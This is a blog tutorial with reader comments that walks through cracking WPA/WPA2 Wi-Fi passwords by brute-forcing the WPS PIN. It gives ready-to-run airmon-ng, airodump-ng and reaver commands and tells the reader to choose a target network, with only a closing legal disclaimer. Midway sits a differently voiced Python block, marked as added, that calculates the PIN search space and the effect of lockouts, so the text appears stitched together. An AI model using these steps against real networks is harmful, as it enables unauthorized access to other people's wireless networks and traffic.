With the WPS (Wi-Fi Protected Setup) security flaw, it is really easy for anybody with a Linux computer, a wireless network card capable of packet injection and a lot of patience to crack a WPA or WPA2 password. WPS exists today in nearly every router and access point out there.

With REAVER, we are going to run a brute force attack against a WPS-enabled router protected with WPA or WPA2 and thus obtain the Wi-Fi password, within a window of about 10 hours depending on the router.

Tools Needed:

  • A computer with a packet injection capable wireless network card or a USB wireless adapter
  • A Live Linux CD or USB flash drive (we will use BackTrack 5 R2, which comes with REAVER already installed)
  • The REAVER utility (if you are not using Backtrack 5 R2)
  • A WPA or WPA2 protected Wi-Fi setup with a WPS capable router

Now, let’s get down to business:

  • The very next step is to boot from your Live BackTrack 5 R2 CD or USB flash drive (or any Linux flavor)
  • Next, install Reaver if you are not running BackTrack 5 R2
  • Next, at the command prompt, type the following command and hit Enter: iwconfig


Note: This command outputs the list of your network interfaces and details about the ones with wireless capability. Make a note of the wireless ones, for example wlan0 or wifi0.

  • Next, type: airmon-ng start XXXX (XXXX being your wireless interface). Example: airmon-ng start wlan0


Note: This command basically puts the wireless interface in monitor mode. Make a note of your monitor interface name. It should be something like mon0 or mon1.

  • Next, type: airodump-ng wlan0
  • If the above command does not work, type: airodump-ng mon0 (mon0 being the monitor interface we discovered in the previous step).


Note: This command will display a list of the SSIDs of all neighbouring networks. Notice that it also displays non-broadcast SSIDs. When you see the SSID of the network you want to crack, hit CTRL+C to stop the scan. Take note of the BSSID, which is basically the MAC address of the access point (or wireless router).

Now let's start cracking this wireless password.

  • The syntax of the command we are going to type next looks like this:

reaver -i monitored_interface -b router_bssid -vv

For instance, if your monitor interface is mon0 and your router or access point BSSID is AA:BB:CC:DD:EE:FF, the final command is the following one:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv


After hitting enter, the cracking process will begin. The length of this process varies depending on the type of router or access point that you have.
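Why the search finishes in hours rather than years: the access point confirms the first four PIN digits and the last four separately (after M4 and M6 of the WPS exchange), and digit 8 is a checksum of the first seven, so a complete brute force is at most 11,000 attempts instead of 10^8. The Python below is an added example, not code from this post or from Reaver; the lockout parameters of worst_case_hours are an assumed defensive setting, included to show how an access point that suspends WPS after a few failures stretches the run, and why turning WPS off removes the problem entirely.

```python
# Constructed example: effective search space of an 8-digit WPS PIN.
# Not Reaver's code; the checksum rule is the one defined by the WPS spec.

def wps_pin_checksum(first7: int) -> int:
    """Checksum digit (digit 8) derived from the first seven PIN digits."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)  # odd positions from the right weigh 3
        first7 //= 10
        accum += first7 % 10        # even positions weigh 1
        first7 //= 10
    return (10 - accum % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    """True when pin is 8 digits and its last digit matches the checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))

def worst_case_attempts() -> dict:
    """Attempts needed to exhaust each half, since the AP confirms them separately."""
    first_half = 10 ** 4       # digits 1-4, all free
    second_half = 10 ** 3      # digits 5-7 free, digit 8 fixed by the checksum
    return {"first_half": first_half,
            "second_half": second_half,
            "total": first_half + second_half}   # 11,000 rather than 10**8

def worst_case_hours(seconds_per_attempt: float,
                     lockout_after: int = 0,
                     lockout_seconds: float = 0.0) -> float:
    """Wall-clock upper bound for a full search.

    seconds_per_attempt: one M1..M7 exchange plus any fixed delay (Reaver
    waits 1 second between attempts by default, as the post notes).
    lockout_after / lockout_seconds: assumed defensive setting of an AP that
    suspends WPS for lockout_seconds after lockout_after failed attempts.
    """
    total = worst_case_attempts()["total"]
    seconds = total * seconds_per_attempt
    if lockout_after > 0:
        seconds += (total // lockout_after) * lockout_seconds
    return seconds / 3600.0

if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"), worst_case_attempts())
    print(round(worst_case_hours(1.0), 1), "h upper bound without lockout")
    print(round(worst_case_hours(1.0, 3, 60), 1), "h with a 60 s lockout every 3 failures")
```

The wall-clock figure is an upper bound on attempts at a fixed rate; real runs also depend on retries and radio conditions, which is why the post quotes a range rather than a fixed time.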

You can also pause the process by hitting CTRL+C at any time. This interrupts the process but saves the progress for when you run the command again.

After Reaver is done cracking the password, it will display a screen like the following one:


We have had quite a bit of feedback that the REAVER command we issued was not working for some routers/access points.

ORIGINAL COMMAND: reaver -i monitored_interface -b router_bssid -vv

If this command does not work for you, we can add the option -d 0 to it. This option suppresses the 1 second delay that REAVER waits between PIN attempts.

UPDATED COMMAND: reaver -i monitored_interface -b router_bssid -vv -d 0

Example: reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv -d 0


Most of the routers/access points out there won’t like the delay suppression, so don’t use it unless the original command isn’t working for you!!


This article is for education and testing purposes only. Using this method to crack someone else's wireless network is against the law. Do so at your own risk.

  1. September 7, 2012 at 2:17 am

    Reblogged this on Gigable – Tech Blog.

  2. September 8, 2012 at 8:40 am

    Reblogged this on Welcome To Prasad Linux Blog.

  3. January 11, 2014 at 4:43 am

    Your way of explaining everything in this post is in fact
    pleasant, everyone can simply know it. Thanks a lot.

